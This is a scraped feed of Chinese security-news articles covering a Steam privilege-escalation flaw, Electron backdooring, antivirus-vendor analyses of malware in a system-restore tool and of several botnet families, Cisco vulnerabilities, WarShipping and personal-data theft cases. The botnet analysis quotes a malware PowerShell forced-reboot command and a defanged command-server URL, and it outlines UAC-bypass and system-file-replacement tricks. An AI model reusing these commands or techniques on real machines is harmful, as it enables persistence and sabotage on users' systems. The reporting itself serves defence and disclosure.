不过,研究人员发现了一些奇怪的现象。当服务启动和停止时,“Users”用户组可对HKLM\Software\Wow6432Node\Valve\Steam\Apps注册表项下的子项进行完全读写访问。

“我创建了测试项HKLM\Software\Wow6432Node\Valve\Steam\Apps\test,并重新启动了服务(我使用了Procmon监控软件),然后检查了注册项权限。最后发现“Users”用户组对HKLM\SOFTWARE\Wow6432Node\Valve\Steam能够“完全控制”,其所有子项也是如此。我假设RegSetKeySecurity(和安全有关的API)也受到影响,于是尝试创建从HKLM\SOFTWARE\Wow6432Node\Valve\Steam\Apps\testHKLM\SOFTWARE\test2的链接,并重新启动了服务。”

aa.png

最后,研究人员尝试配置了一个符号链接,将这些普通用户能控制的子项链接到另一个没有权限操控的项,结果发现自己也可以修改该项。

此时,研究人员意识到,任何注册表项都可以通过将HKLM\Software\Wow6432Node\Valve\Steam\Apps下的子项创建到目标项的符号链接来进行非法修改。

这意味着普通用户可以修改具有SYSTEM权限的服务,从而实现非法提权。

另一位研究人员放出了PoC

在Felix发表了有关漏洞详细信息的文章后,另一位研究人员Matt Nelson在GitHub上放出了漏洞利用PoC。Matt Nelson以前有一个网名enigma0x3,以发现提权漏洞而闻名。

Nelson的PoC主要创建了一个HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service的符号链接,这样就可以更改在重新启动服务时所涉及的可执行文件。

脚本执行完后,可在后台看到一个具有管理权限的Windows命令窗口,如下所示。

44.jpg

Nelson表示他也曾和Valve交流过有关漏洞的问题。

BleepingComputer已主动联系了Valve,询问为什么这个漏洞没有被修复,但是在本文发布时还没有得到回复。

9999.jpg

]]>
Electron 应用容易被修改并植入后门 Sun, 18 Aug 2019 13:46:49 +0800 因其跨平台能力,Electron 开发平台是许多应用的关键组成部分。基于 JavaScript 和 Node.js 的 Electron 被用于 Skype、WhatsApp 和 Slack 等流行消息应用,甚至被用于微软的 Visual Studio Code 开发工具。但 Electron 也会带来安全隐患,容易修改植入后门

Electron_Framework_Exploitation_Extract_Master_Password_602_280_75.jpgElectron_Framework_Exploitation_Bitwarden_Greeting_602_378_75.jpg

安全研究员 Pavel Tsakalidis 演示了一个 Python 开发的工具 BEEMKA,允许解压 Electron ASAR 存档文件,并将新代码注入到 JavaScript 库和内置 Chrome 浏览器扩展。

漏洞不是在应用程序中,而是在应用程序使用的底层框架 Electron 中。

Tsakalidis 称他联络了 Electron 但没有得到回应。                     

Electron_Framework_Exploitation_Extract_Contents.jpg

9999.jpg

]]>
你还在用"加了料"的系统还原工具么? Sun, 18 Aug 2019 13:46:49 +0800 【快讯】利用激活软件、系统盘等工具传播病毒和流氓软件已是屡见不鲜的一大乱象,由于此类工具通常都是装机后首先安装的软件,盘踞在上面的病毒和流氓软件便利用介入时机更早的优势各种作恶,捆绑安装、劫持首页甚至与安全软件进行对抗,令普通用户苦不堪言。
就在日前,火绒接到用户反馈,称使用U深度U盘启动盘制作工具还原系统之后,安装的火绒安全软件被删除。火绒工程师分析发现,该还原工具可调用病毒程序,根据不同系统环境还原系统时,对指定软件进行删除,并篡改IE浏览器首页。
此外,火绒工程师溯源分析,该还原工具早期版本中的病毒程序不仅可以直接执行删除第三方软件(包括火绒)和一些带有首页劫持功能的流氓软件等恶意行为,还会篡改浏览器首页配置、浏览器收藏夹以及推广其它软件。火绒工程师由此判断,该激活工具是为推广同名软件做准备,从而争夺软件安装计费名进行牟利。
Image-4.png  
图:被病毒程序删除的第三方软件
而在新版U深度U盘启动盘中,已经没有推广捆绑等行为,但仍然存在删除第三方软件等遗留恶意行为。虽然此举对用户无法造成实质性危害,但我们依旧建议大家谨慎使用此类还原工具,并使用正版还原软件。用户如果使用过该激活工具,可使用火绒及时扫描查杀病毒程序。
Image-5.png
 
附【分析报告
一、病毒分析
火绒接到用户反馈,在使用U深度还原GHOST镜像时,备份镜像中的火绒安全软件会被删除。经过分析发现,该GHOST还原程序在还原系统后,会调用NUML0CK.exe进行删除文件的操作。NUML0CK.exe功能主要分为两个部分:PE模式下会删除安全软件、常见的第三方软件和一些带有首页劫持功能的流氓软件;非PE模式下,会篡改浏览器首页、修改浏览器收藏夹等操作。根据上述恶意行为,我们将其定义为病毒进行查杀。
NUML0CK.exe是由AutoIt脚本编译生成的可执行程序,且脚本进行了混淆,所有的分析均基于反混淆后的脚本文件。脚本中用到的所有字符串和数值常量均初始化存储在一个大数组中,然后使用数组元素对变量进行初始化并使用。如下图所示:
Image-6.png
经过混淆的原始脚本文件
由程序的逻辑可以得到所有变量对应的字符串和常量,接下来对NUML0CK.exe实际的功能部分进行分析。NUML0CK.exe首先会读取注册表信息,判断是否运行在PE环境下。相关代码,如下图所示:
Image-7.png 检测是否为PE环境
在PE环境下,NUML0CK.exe会根据还原镜像的不同,对特定镜像中含有的主页锁定程序和推广程序进行处理,从而更加方便自身进行主页锁定和软件推广。NUML0CK.exe判断当前还原镜像需要进行何种操作时,首先会读取还原镜像中的Windows\System32\config目录下的SYSTEM,SOFTWARE, DEFAULT注册表文件的时间和大小信息,之后连接成字符串,并计算MD5,用于标识特定的镜像文件。相关代码,如下图所示:
Image-8.png 计算镜像文件标识
对于每种特定的不同的镜像文件进行不同的操作,基本上为对镜像文件中的特定首页劫持和推广程序进行删除或用空程序进行替换操作,以及创建结尾为.exe的文件夹,阻止还原后的镜像产生同名的推广安装包程序。如下图所示:
 Image-9.png
根据不同镜像进行不同操作
Image-10.png 删除镜像中的文件或用空程序替换
检测随机名驱动,如果存在,则设置标志,并记录驱动名和要删除的程序名。删除随机名驱动和常见杀软驱动的注册表项。当用于标识镜像的MD5串值为6995C85148CC8EED5EDF0904225DDC3F、A8330A79482095C239EF17C3C299883D等,且检测到存在文件MD5为    26F63B278F6061187B37BB8C867B823B、B16CAB3077C11387BB32A4C5E14C47D0等的随机名驱动文件时,触发删除火绒的流程。但由于代码中可能存在bug,当读取分区Windows\System32\config目录下的SYSTEM注册表文件失败时,也会触发删除流程。如下图所示:
Image-11.png 检测随机名驱动
Image-12.png 删除随机名驱动和常见杀软驱动的注册表项
如果检测到特定随机名驱动,程序还会设置SetupType注册表键值,并继续设置SOFTWARE和USER注册表,最终将删除流程的标记位置1,执行安全软件、常见软件及流氓软件的文件删除流程。如下图所示:
 Image-13.png
触发删除流程
删除流程首先会删除分区目录下的劫持首页的流氓程序。如下图所示:
Image-14.png 
删除劫持首页的流氓程序
遍历分区两级目录和特殊目录,删除常用的杀软,视频影音等软件的安装包程序。删除软件目录的相关操作疑似用来争夺软件安装计费名,不排除其推广安装同名软件进行牟利的可能性。如下图所示:
Image-15.png 
遍历的目录
受病毒影响的软件安装包列表,如下图所示:
Image-16.png 
删除的软件安装包
病毒还会删除桌面上特定的后缀为.exe, .lnk和.url文件。如下图所示:
Image-17.png 删除桌面特定文件  
删除Program Files目录和Program Files (x86)目录下的常用杀软,视频影音等软件的程序文件夹。删除QQ浏览器的升级程序和2345软件文件夹。如下图所示:
Image-18.png 删除常用软件的安装目录
受影响的软件目录列表,如下图所示:
Image-19.png 
删除的程序文件夹
篡改IE浏览器首页,如下图所示:
Image-20.png 篡改首页
该病毒在非PE环境下还会进行劫持首页、添加收藏夹,并将主机的信息加密后上传至服务器。相关行为,如下图所示:
Image-21.png 首页篡改和添加收藏夹
Image-22.png 拼接信息,加密并发送
我们发现使用15年版本的U深度安装系统时,NUML0CK.exe会被添加进开机启动项中,执行非PE环境下的代码,用于篡改首页,添加收藏夹,推广软件等。推广的软件有360安全浏览器,爱奇艺。但在使用最新版的U深度安装系统时,NUML0CK.exe并不会被添加到开机启动项中,不会运行非pe环境下的代码逻辑。究竟是推广策略的变化还是其他的原因不得而知。但是在使用最新的U深度备份系统时,备份程序会首先劫持首页,再进行备份,致使还原出来的系统均会被劫持首页。如下图所示:
Image-23.png U深度15年版本装机
NUML0CK.exe检测特定的镜像文件,对锁首流氓程序和推广安装包进行检测和处理,并且NUML0CK.exe在之前的版本中被用于推广软件,推测应为与同行争抢安装包推广渠道和首页流量。对于需要进行系统备份的用户,建议使用正版软件,以避免收到类似的病毒威胁。
 
二、附录
Image-24.png

9999.jpg

]]>
最新勒索软件曝光 收到不明邮件可要当心了 Sun, 18 Aug 2019 13:46:49 +0800 近日,安全研究人员发现了一种新型的勒索软件,这类勒索软件专找Android用户下手。在过程中透过短信感染手机通讯录中的联络人,最终此类勒索软件可通过受害者的手机进行大量的传播。

据悉,黑客在网站上张贴技术主题内容和不良网站的相关链接,从而引诱使用者通过攻击者控制的网域下载恶意程序。一旦下载到用户的Android手机上,勒索软件就会加密手机上大部分的用户档案并和用户索要赎金,同时发送大量短信将恶意链接给受害者手机内的联络人资料,以便进一步散布。同时这些短信的内容是十分逼真的,例如其中一则附上一张经过合成的照片,使得接收到短信的人会急于点开链接。根据统计,从六月到七月已经有59位用户点击了这个恶意网站,从而将勒索软件进行了进一步的扩散。

据悉这种勒索软件具有42种语言版本的短信模版,在给受害用户发送时会设置成不同的语言,并且会在信件的开头加上联络人姓名,使得信件看上去更加逼真。

最终当不知情的用户接到短信并且点入链接后,会被自动导向一个恶意的app。受害者必须手动安装,一旦app开启后就会如实显示被加工的不良照片。

不过据悉它主要目的是建立与PC的连接,并找到用户的磁盘,将几乎所有档案全部加密,然后勒索价值94到188美金的比特币。使用者或许能移除该app,但是却无法解密。

研究人员表示,在程式码中包含着复杂的密钥,因此想要破解是十分困难的。这表示感染后,想不付钱救回档案几乎不可能。这里还是建议大家,收到不明的邮件及短信后,不要轻易的点击链接查看,以免造成更大的损失。

9999.jpg

]]>
群魔乱舞:五大国产病毒家族的末日收割 Sun, 18 Aug 2019 13:46:49 +0800 一、事件概述

近期毒霸安全团队通过“捕风”威胁感知系统再次监控到一起大规模病毒传播活动,监控数据显示本次的病毒传播源头为“GX下载器”,分析后我们确认该下载器家族静默安装的“速搜”、“视力管家”等流氓软件为“驱魔”暗刷僵尸家族新变种宿主,除了原有暗刷功能模块更新外,其重要变化是此批流氓安装包中被嵌入下载者后门,通过该后门模块二次推送安装“老裁缝”、“双枪”、“紫狐(GAD)”、“独狼(幽虫)”等其他病毒家族变种,以上均是近些年境内高活跃度的老牌僵尸木马家族,传播时间跨度大多在3年以上,恶意功能模块繁多,涉及流量劫持、恶意推广、广告暗刷、DDOS、挖矿、盗号、蠕虫等等,部分家族的活跃高峰期影响用户量甚至超千万级别。

image1.png


通过长期数据监控分析,我们观测到上述部分病毒家族在传播渠道、技术手法、代码相似性、CC基础设施复用、攻击目标等多方面均存在交叉关联的情况,幕后团伙极有可能为同一组织,详情可参见友商“御见”安全团队针对上述部分家族的深度关联分析报告。上述老牌病毒家族借助同一宿主母体活跃传播的情况近年比较少见,从侧面也说明上述木马家族传播活动愈发肆无忌惮,在PC后流量时代试图疯狂抱团进行最后价值的压榨收割。以下我们针对上述病毒家族的活跃历史、技术特点以及危害行为进行简单梳理:


1) “驱魔”家族


该家族传播渠道多样,传播周期较长,最早在2017年被毒霸安全团队披露,寄生于“花瓣壁纸”、“锁大师”等流氓软件中,主要恶意行为为主页劫持和流量暗刷。早期变种利用系统服务、系统驱动劫持等方式实现隐蔽常驻,后续大多借助“流氓软件”外壳寄生实现注入系统进程,通过多层解密和内存加载释放和傀儡进程注入来躲避安全软件查杀,并且暗刷配置和暗刷插件都是云端配置,控制灵活、扩展性和兼容性好。


以“暗刷”功能为例,我们监控捕获到的各类暗刷插件已累计数百个,“驱魔”家族一直都是国内最活跃最庞大的暗刷僵尸网络之一,本次更新变种更是成为众多老牌病毒家族的直接母体传播源。


2) “老裁缝”家族


该病毒家族由毒霸安全团队在2017年分析披露,因其早期变种宿主为“老裁缝激活工具”而得名。其底层技术框架为rootkit+ring3云控模块的形式,扩展性较好,主要用于主页劫持、电商广告劫持、流量暗刷等。


近两年依旧在不停变种更新,2018年中在“双生花”暗刷事件中被再次披露,与另外一个暗刷家族“JsCtrl”共同藏身于“心跳助手”正规软件的外壳下隐蔽攻击近半年时间;2019年7月初,又一次被毒霸安全团队发现借助“眼睛守护神”流氓软件传播。


3) “紫狐(GAD)”家族


该家族传播时间跨度较长,早期活跃痕迹可以追溯到2014年左右,国内安全团队对该家族变种的命名也较多,包括“黑狐/紫狐”(360安全团队)、“肥兔”(腾讯安全团队) 、“掘金幽灵”(绿盟安全团队)等。该家族主体功能模块使用delphi编写,传播渠道多样,善于利用白程序混淆伪装自身,多使用系统模块替换劫持技术和Rootkit驱动隐藏自身对抗查杀,去年还加入了“永恒之蓝”传播模块,另外在2016年底的“天翼校园客户端蓝屏事件”以及2017年底的“天翼校园客户端挖矿程序事件”也出现过其活动痕迹。



因其模块配置和符号名称多使用“Gad”字符后缀,毒霸安全团队内部将其名为为“GAD”家族,通过近几年的持续监控分析,我们发现其组建的僵尸网络曾推送过流氓推广、DDOS攻击、挖矿、远控木马、主页劫持等多种恶意插件,本次捕获的最新变种核心模块为门罗币挖矿和DDOS攻击,其中DDOS攻击目标集中在游戏私服,棋牌赌博游戏,色情网站等灰产行业,相关技术细节将在本文后续部分展开。


4) “双枪”家族


该家族传播多见于私服外挂捆绑、ghost盗版系统内置、下载站、流氓软件暗推等渠道,其幕后团伙与国内私服运营团队可能存在密切关联,该家族最早在17年被360安全团队分析曝光,以采用“MBR+VBR”双Bootkit技术而知名,善用百度贴吧图床藏匿病毒,同时在技术对抗性上非常强,内核模块使用VMP加密保护,使用底层磁盘驱动挂钩、文件系统对象劫持、网络劫持阻断、注册表HIVE锁定等rootkit技术对抗安全软件查杀,落地功能模块多为主页劫持、私服劫持、电商劫持、DDOS攻击等。


2018年的部分变种功能模块为毒霸安全团队披露过的“贪狼”家族,除此之外,我们还发现部分“双枪”家族变种曾推送过“驱魔”病毒,可见这些病毒团伙幕后存在非常紧密的合作关系。


5) “独狼(幽虫)”家族


该家族主要通过盗版ghost系统预装、激活工具捆绑、下载器等方式进行传播推广,落地功能模块主要用于浏览器劫持、推广安装、病毒推送等恶意行为,腾讯安全团队(命名为“独狼”)和360安全团队(命名为“幽虫”家族)在2018年都相继进行过分析披露,该家族rootkit模块功能相对完善,包含文件系统过滤、注册表过滤、网络过滤、进程镜像过滤等多种技术对抗杀软查杀。从我们的历史观测数据来看,早在2017年该家族就已经开始出现,从2018年中至2019年初保持较高活跃度,每月都有版本迭代更新,本次截获的最新变种还加入了DDOS等木马家族推送。



二、技术分析


本次病毒活动涉及的家族变种较多,本篇技术分析主要摘选“驱魔”新变种的内嵌后门及其推送的“紫狐(GAD)”家族、“独狼”家族等最新变种相关部分,其他如“驱魔”暗刷家族、“老裁缝”、“双枪”家族均已被毒霸安全团队和其他安全友商多次披露分析,此处就不再一一赘述,详情可以参考本文末尾标注的文章。


2.1 “驱魔”新变种内嵌后门分析


image2.png


以其中的一款宿主流氓软件“速搜”为例,该软件目前主要通过“GX下载器”家族进行诱导安装,病毒推送后门“AzUpdater.exe”的下载链接直接硬编码在软件安装包内部,通过内存加载运行并不落地。在后门逻辑触发前,病毒程序会根据安装包渠道号配置联网获取对应的城市IP规避规则,并且会检测杀软运行、虚拟机、系统版本等主机运行环境,避免被安全软件检测发现。主要执行流程如下图所示:


image3.png


病毒推送后门“AzUpdater.exe”功能并不复杂,主要负责下载执行“老裁缝”、“双枪”、“紫狐(GAD)”、“独狼(幽虫)”等病毒家族的变种母体并上报统计信息。上述病毒家族的检测条件和下载链接均硬编码在后门程序代码内,具体配置如下表所示(截至发稿前,病毒作者仍在不停更新相关病毒推送链接配置):


image4.png


2.2 “紫狐(GAD)”家族最新变种分析


病毒执行流程如下图:


image5.png


1. 偷天换日隐蔽启动


“紫狐(GAD)”家族最新变种的母体文件为“1wf3xon57hkk4hjw_009.exe”,运行后会联网下载两个MSI安装包,均采用打包工具“Advanced Installer”制作并开启虚拟机环境检测配置,其中“uac.msi”负责利用系统“mscfile”注册表缺陷漏洞绕过UAC并篡改系统安全配置,而另外一个安装包“1wf3xon57hkk4hjw_009.msi”主要负责“紫狐(GAD)”家族服务模块的安装,技术手法依然是惯用的“PendingFileRenameOperations”重启替换系统模块。



主要执行流程如下:


1)  UAC绕过,该方法最早由国外安全研究员enigma0x3披露,在最新win10系统已被修复,修改的注册表项如下,主要目的是允许非授权用户以SYSTEM权限运行MSI安装文件:


image6.png


2)  PendingFileRenameOperations重启替换,该手法是“紫狐(GAD)”家族的惯用手法,通过修改注册表配置,利用系统机制实现对原始系统服务模块的替换劫持。模块释放配置和篡改注册表内容如下:


image7.png


PendingFileRenameOperations替换规则是两行为一组,第一行为原文件路径第二行为替换文件路径,如果空行则表示删除原文件。通过注册表内容可以发现其替换步骤如下:


a) 首先备份系统sens.dll为Acpsens.dll


b) 删除系统目录sens.dll


c) 将C:\RECYCLER\TempA\.ini替换成系统目录的sens.dll


d) 删除旧Ke449476.xsl


e) 将C:\Windows\.ini替换到C:\Windows\AppPath\Ke449476.xsl


3)  Powershell强制重启,上述PendingFileRenameOperation方法的缺陷就是需要用户重启后才会生效触发,所以病毒作者加入2小时强制重启用户系统的操作。


powershell.exe  Start-Sleep -Seconds 7200; Restart-Computer-Force 


2. 多重隐藏保护自身


通过上文PendingFileRenameOperation机制可知:系统重启后会在启动阶段加载执行假系统服务“sens.dll”,随后木马创建服务模块MsxxxxxxxApp.dll。采用了如下两种方式保护该服务:


1)对存MsxxxxxxxxApp.dll加VmpProtect保护,以对抗静态分析和查杀。


image8.png


2)由服务模块注入系统进程释放驱动,隐藏自身。


通过ZwLoadDriver加载驱动,加载完成后随即删除自身,避免暴露。驱动签名冒用域联和方正。


image9.png


驱动程序包含新旧两套,旧驱动会安装在Vista及以下系统中,值得注意的是通过pdb信息发现与当年天翼客户端蓝屏事件中,被植入的恶意程序时钟日历释放的驱动pdb信息一致。可以确定为同一伙人所为。


image10.png


而在win7及以上系统中使用了另一套新驱动,兼容性和稳定性有了一定的提升。


image11.png


此新驱动代码修改自GitHub上的开源项目https://github.com/JKornev/hidden。代码基本一致。


image12.pngimage13.pngimage14.pngimage15.pngimage16.pngimage17.pngimage18.pngimage19.pngimage20.pngimage21.png


demodll.dll通过联网访问hxxp://down.tj999.top/ccc678.ini 获取配置信息。从配置信息看,主要功能依旧为浏览器劫持、静默推广安装等,除了2345浏览器外,其他均为DDOS、盗号木马等类型的病毒。


image22.pngimage23.png图片3.png

9999.jpg

]]>
Windows 静默更新修复新发现的英特尔 CPU 预测执行漏洞 Sun, 18 Aug 2019 13:46:49 +0800 微软上个月向 Windows 操作系统推送了静默更新,堵上了一个新发现的英特尔 CPU 预测执行漏洞。安全公司 Bitdefender 的研究人员周二披露了该漏洞,漏洞影响 2012 年之后的所有英特尔 CPU,由研究人员在 12 个月前发现并报告给英特尔。通过滥用预测执行,攻击者可以打开一条旁路,泄漏加密密钥、密码、私人对话以及其它被保护的秘密。新的攻击利用了名叫 SWAPGS 的指令,类似 2018 年公开的 Spectre 和 Meltdown 漏洞。研究人员测试了两款 AMD CPU,没有发现存在相同漏洞的证据。微软上个月释出的更新改变了 CPU 预测访问内存的方式,补丁不需要微码更新,漏洞编号 CVE-2019-1125。9999.jpg

]]>
IBM X-Force Red发现新型网络风险:用邮寄方式入侵WiFi网络 Sun, 18 Aug 2019 13:46:49 +0800 IBM X-Force Red是隶属于IBM Security的一个资深安全团队,主要目的是发现和防范网络中存在的潜在漏洞。今天该团队发现黑客可以利用网络安全的潜在漏洞渗透网络,实现访问设备以及窃取设备上的数据。这项新技术被X-Force Red称为“Warshipping”,黑客会在包裹内部署一个名为“战舰”(WarShip)的巴掌大小计算机,并通过快递方式将其运输到指定机构,随后入侵这些机构的WiFi内部网络。

warship-device.png

和Wardialing或者Wardriving这样的传统方式不同,Warshipping是一种支持3G网络的设备,因此避免了传统方式必须要在黑客设备范围内的局限性,能够更加灵活的进行远程和现场控制。

一旦到达目标站点,设备就会留意可用于探测网络的潜在数据包。 IBM X-Force Red的全球管理合伙人Charles Henderson记录了该团队进行被动无线攻击的过程:

举个例子我们听到了一次握手,一个信令表明设备建立了网络连接。其中一个WarShip设备将捕获的哈希传送到我们的服务器,然后我们利用后端进行破解,基本上就是用户的无线密码,然后获得WiFi的掌控权。

一旦WarShip成功入侵机构的WiFi,并且随后对所有与其连接的设备进行访问。该WarShip设备还会创建自己的流氓WiFi网络,迫使目标设备连接到该网络。自此该机构的关键信息,例如用户名和密码都会发送给黑客,以便于黑客进行后续的网络攻击。

查尔斯通过总结了该团队的调查结果:在这个warshipping项目中,遗憾的是,我们能够建立持久的网络连接并获得对目标系统的完全访问权限。

需要部署到站点的设备基本上由单板计算机(SBC)组成,该计算机在传统的手机可充电电池上运行。此外,使用现成的组件,制作成本仅约100美元,而且它看起来就像是用于学校展示的DIY项目,而不是用于入侵网络的设备。

9999.jpg

]]>
“瑞智华胜”涉嫌非法窃取用户信息30亿条 7人被公诉 Sun, 18 Aug 2019 13:46:49 +0800 22.png

        公众公司窃取30亿信息案被公诉 ,严打网络黑产提出新课题

  去年8月,浙江省绍兴市越城区公安分局侦破一起特大流量劫持案,涉案的是新三板上市公司北京瑞智华胜科技股份有限公司(下称“瑞智华胜”)。该公司及其关联公司多名犯罪嫌疑人被抓获,涉嫌非法窃取用户个人信息30亿条,涉及全国96家互联网公司产品。

  近日,越城区检察院介绍,已对该犯罪团伙中的周某某等7名被告人提起公诉,其中被告人周某某系公司法定代表人,负责公司运维部的各项工作;被告人黄某某系公司股东,负责关联公司与运营商签订营销协议,获取运营商登录权限;被告人梁某某、石某某系公司运维部员工,主要负责有关程序的部署;被告人袭某等3人系公司研发部员工,负责有关程序的研发、维护以及优化更新。

  公开报道显示,瑞智华胜成立于2013年,2017年12月1日正式挂牌新三板,另有两家关联公司实际控制人均为邢某(另案处理)。从2014年开始,涉案公司以竞标的方式,先后与覆盖全国十余省市的电信、移动、联通、铁通、广电等运营商签订营销广告系统服务合同,为运营商提供精准广告投放系统的开发、维护,进而拿到了运营商服务器的远程登录权限。

  为了劫持运营商流量,在明知不合法的情况下,该犯罪团伙将自主编写的恶意程序放在运营商内部的服务器上,当用户的流量经过运营商的服务器时,该程序就自动工作,从中清洗、采集出用户cookie(用户登录网站论坛之类的账户密码等数据记录)、访问记录等关键数据,再通过恶意程序将所有数据导出,存放在境内外的多个服务器上。

  在案件侦办中,警方发现运营商流量遭劫持,接连导致百度、腾讯等全国96家互联网公司用户数据被窃取,也就是说,几乎国内所有的大型互联网企业均被“雁过拔毛”。而操控用户帐号进行微博、微信、QQ等社交平台的加粉、刷量、加群、违规推广,该犯罪团伙旗下一家公司一年营收就超过3000万元。

  黑数据公司和数据黑灰产团伙是数据泄漏的罪魁祸首,加强打击和处罚力度,提高违法成本已成治理共识。近年来,侵犯公民个人信息类刑事案件呈现爆炸式增长的局面,说明打击力度正在加大。

  截至今年5月,浙江省“净网”2019专项行动破获各类网络黑产刑事案件262起,抓获犯罪嫌疑人1047名。但有数据显示,侵犯公民个人信息类刑事案件的缓刑频次高,刑罚威慑低。其中,出售、非法提供公民个人信息罪、非法获取公民个人信息罪和侵犯公民个人信息罪的量刑较轻,被告人大多被判处3年以下有期徒刑或拘役。计算机类犯罪虽然平均刑期较高,最高可判刑7年,但司法实践中缓刑适用率较高。

  瑞智华胜案令人瞠目结舌之处,除了涉案信息量规模之大,更在于这家上市公司用合法的外衣做掩护,进行网络黑产的勾当,给网络安全防范提出了新课题。

  公安部网络安全保卫局处长祝国邦等人2018年11月就曾撰文指出,在对近年来的网络攻击行为进行深入分析发现,恶意代码的传播和扩散占了很大比例,尤其是披着“合法”外衣的恶意软件,使恶意代码在传播速度与影响面方面有了大幅提升,而常规基于特征识别,例如信息摘要算法(MD5)、关键字等的安全防护措施往往失效,给恶意代码的发现与防护带来了难度。

  业内人士介绍,部分原因是近年来随着用户端安全意识的提升,免费安全软件的普及,普通的挂马、漏洞利用的成本越来越高,在这种态势下,黑产不得不寻找新的攻击方式。

  瑞智华胜案的另一个特别之处在于其在体系内完成了网络黑产产业链。数据黑灰产行业,通常分为数据盗取、数据买卖交易、数据违法违规使用三个流程环节。

  瑞智华胜则一体化完成了数据盗取和使用,这意味着网络黑产暴露的环节减少,反侦查能力提升。同时,能够完成网络黑产的“自产自销”,也说明了违法行为主体已具备一定的技术、市场开发能力。简单地说,已从个体化的黑客违法升级为集团化黑产。

  这对打击网络黑产提出了新课题。从技术力量和经费方面,公安机关在网络犯罪的侦破方面往往显得底气不足。据报道,阿里巴巴发现了瑞智华胜危害数据安全的行为,并向警方提供了技术协助。这种协同治理的方式已成为打击网络黑产的重要经验。因此,除了加强网络安全人才的引进,加大办案经费和网络监管设备等方面的经费投入,还要开放利用市场中的网络安全资源,才能综合提高网络监控和案件侦破能力。

◆来源:新浪财经

9999.jpg

]]>
思科交换机的新漏洞恐引起新一轮全球扫描 Sun, 18 Aug 2019 13:46:49 +0800 22.png

近期,思科修复了旗下明星产品——Cisco Small Business 220系列智能交换机上的三个高危漏洞。

这三个漏洞分别是身份验证绕过(CVE-2019-1912,评级为致命,评分为9.1)、远程命令执行(CVE-2019-1913,评级为致命,评分为9.8)和命令注入(CVE-2019-1914,评级为中等,评分为7.2)。

这三个漏洞中,前两个最为危险,因为攻击者可以利用它们在不经过身份验证的情况进行远程攻击。考虑到思科刚刚才公布漏洞,现公网上任意思科220系列智能交换机都有可能受到攻击。

在今天发布的一份安全建议中,思科表示,攻击者可以利用身份验证绕过漏洞,将文件非法上传到思科220交换机上。攻击者可借此直接替换配置文件,或者植入一个反向shell。

第二个漏洞(也是这三个漏洞中最危险的一个)可让攻击者以root权限执行任意命令,彻底接管设备。而且这只需要简单的HTTP或HTTPS交互即可实现。

安全补丁和防御措施

好消息是,这三个漏洞都是基于交换机的web管理界面。所以设备管理者可以通过直接关闭web管理界面临时防御攻击,当然,最好还是及时安装思科发布的官方补丁。

在思科发布的Cisco Small Business 220系列智能交换机固件版本1.1.4.4中已修复了这三个bug。据思科自己的说法,之前的所有版本都存在被攻击风险。

思科宣称是物联网网络安全公司VDOO发现并报告了这三个漏洞。但在撰写本文时,VDOO还没有发布任何PoC或漏洞技术细节。

有兴趣的安全研究人员可自行对思科路由器的固件进行逆向,说不定能发现这三个漏洞的利用方法。

考虑到思科是当今互联网设备的领头公司之一,预计在不久的将来,将有不少攻击者将这三个漏洞包装成攻击工具,对全球进行扫描。据跟踪僵尸网络活动和恶意网络扫描的网络安全公司Bad packages的说法,在每周都有不少针对思科设备的恶意扫描。

33.png

44.png

为了彻底防御住这种攻击,每个企业的网络管理员最好能尽快摸清旗下相关思科设备,打上安全补丁。

9999.jpg

]]>
网络世界明星身价:身份证号2元,手机号码30元 Sun, 18 Aug 2019 13:46:49 +0800 公民个人信息泄露事件已屡见不鲜,近日,演员王一博称自己的个人信息被泄露,遭到疯狂骚扰,此类话题再次引发关注。

640.webp.jpg  

购买明星私人信息除了能够满足粉丝的猎奇心理外,粉丝可以根据这些信息掌握明星的行程,甚至可以订到与偶像邻座的机票,入住偶像所下榻的酒店以达到追星的目的,因此粉丝经济也助推了贩卖明星信息的非法产业链。对此律师表示,这种行为已经涉嫌触犯刑律中有关侵犯公民个人信息罪的内容。

  

近日,演员王一博发微博称自己电话号码被泄露,遭到粉丝疯狂骚扰,并贴出电话来电记录,引发公众关注。

实际上,明星艺人信息泄露已经不是第一次。记者调查发现,明星的各种个人信息在微博、微信、闲鱼等渠道被明码标价公开售卖,这些信息价格低廉,从几块钱到100元不等,500元能够打包购买上百位明星的信息。

  

广东中安律师事务所合伙人潘翔律师表示,粉丝经济助推了贩卖明星信息的非法产业链,“黄牛”违法售卖明星信息涉嫌侵犯公民个人信息罪。

  


━━━━━

艺人遭遇电话轰炸

  

8月3日晚上10时许,演员王一博发布微博称,因自己手机号被泄露,自己的生活受到了严重影响,呼吁粉丝不要再去打他的电话。

  

记者从王一博发布的截图中注意到,从8点09分到8点15分,6分钟内有4个电话进来。另一张截图显示,王一博的未接电话有194个。“别再打我电话了,也别再去买我的号码了”。王一博在微博中说。

  

微博一经发出迅速引发公众注意。截至8月4日晚间,该微博已经被累计评论36万。网友们纷纷留言表示心疼艺人,呼吁抵制干扰艺人正常生活的行为。同时也有不少网友发问,“明星的信息真的能买到吗?

  

在微博输入“明星姓名+具体信息”的方式搜索,很容易就寻找到刷屏招揽生意的“黄牛”。

  

为了规避风险,这些黄牛大多选择微信交易。“微博只是用来引流的”。其中一位“黄牛”说。

  

资深追星族小颖(化名)告诉记者,明星信息的买卖在粉丝圈内早已是公开的秘密,而且成本并不高,“如果你想对爱豆(偶像)接送机,那就买他的航班号或者身份证号一查就知道。但是一般不会直接给爱豆(偶像)打电话,这种做法太激进了。

  

记者调查发现,售卖明星信息的“黄牛”无孔不入,从航班、酒店、通告到音乐游戏账号、手机号、身份证号乃至户籍,明星信息被明码标价出售。这些信息价格低廉,从几块钱到100元不等,500元能够打包购买上百位明星信息。


640.webp.jpg

▲根据“黄牛”提供的明星信息,记者查询到了该明星预订的航班行程。网络截图



━━━━━

明星身份证信息可打包出售

  

除了微博,在闲鱼上也有不少售卖明星信息的“黄牛”。他们打着“相遇 相思 相见”的噱头,滚动发布着多位明星的航班动态、手机号、微信等信息。

  

所有的信息均以缩写代指,如sfz(身份证)、hb(航班)、sjh(手机号)、hj(户籍),一位“黄牛”告诉记者这样主要是为了规避风险,防止被平台封号。

  

记者随机咨询三位“黄牛”后发现,明星的身份证的价格从几元到几十元不等。记者随机询问了多名当红明星的身份证信息,黄牛表示打包售价100元。“500元买到上百位明星的身份证号”。

  

“买身份证号其实是为了获得航班信息。粉丝可以在机场查询系统直接搜到明星的乘坐的航班、起飞时间等信息,如果明星已经值机,还可以拿到他的座位号。这样你不仅可以送机,还可以买与明星相邻的座位。”小颖说。她曾经用这个办法购买了不少艺人的身份信息,并成功跟自己的偶像“肩并肩”地坐到了一起。

  

